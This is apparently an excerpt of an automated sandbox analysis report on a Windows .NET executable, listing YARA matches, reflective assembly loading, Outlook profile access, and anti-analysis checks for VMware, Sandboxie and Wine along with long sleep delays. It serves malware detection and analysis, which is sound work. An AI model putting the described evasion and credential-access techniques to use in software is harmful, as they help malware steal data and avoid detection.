              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: hfyhigXccT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: hfyhigXccT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: hfyhigXccT.exe PID: 6448, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: hfyhigXccT.exe PID: 6764, type: MEMORYSTR
              Source: hfyhigXccT.exe, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.hfyhigXccT.exe.b80000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.hfyhigXccT.exe.b80000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.hfyhigXccT.exe.410000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.hfyhigXccT.exe.410000.1.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.hfyhigXccT.exe.410000.2.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.hfyhigXccT.exe.410000.3.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.hfyhigXccT.exe.410000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.7.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.2.hfyhigXccT.exe.c20000.1.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.5.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.11.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.1.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.13.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.2.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.15.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.3.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.9.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_0158C4F4 push esp; iretd 0_2_0158F571
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_0158EC28 push esp; retf 0_2_0158EC29
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_05A69DF7 push E801005Eh; retf 0_2_05A69E01
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_05A61FE8 pushad ; retf 0_2_05A61FF1
              Source: initial sampleStatic PE information: section name: .text entropy: 7.609356662747534
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: hfyhigXccT.exe PID: 6448, type: MEMORYSTR
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\user\Desktop\hfyhigXccT.exe TID: 6484Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exe TID: 6768Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeThread delayed: delay time: 60000Jump to behavior
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exeJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exeJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Users\user\Desktop\hfyhigXccT.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
